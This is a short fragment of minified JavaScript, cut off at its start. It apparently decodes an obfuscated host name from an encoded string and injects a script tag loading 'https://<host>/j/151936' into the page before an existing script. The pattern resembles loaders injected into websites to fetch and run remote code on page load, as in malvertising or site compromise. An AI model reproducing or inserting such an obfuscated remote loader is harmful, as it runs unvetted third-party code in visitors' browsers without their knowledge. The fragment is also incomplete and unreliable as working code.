s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};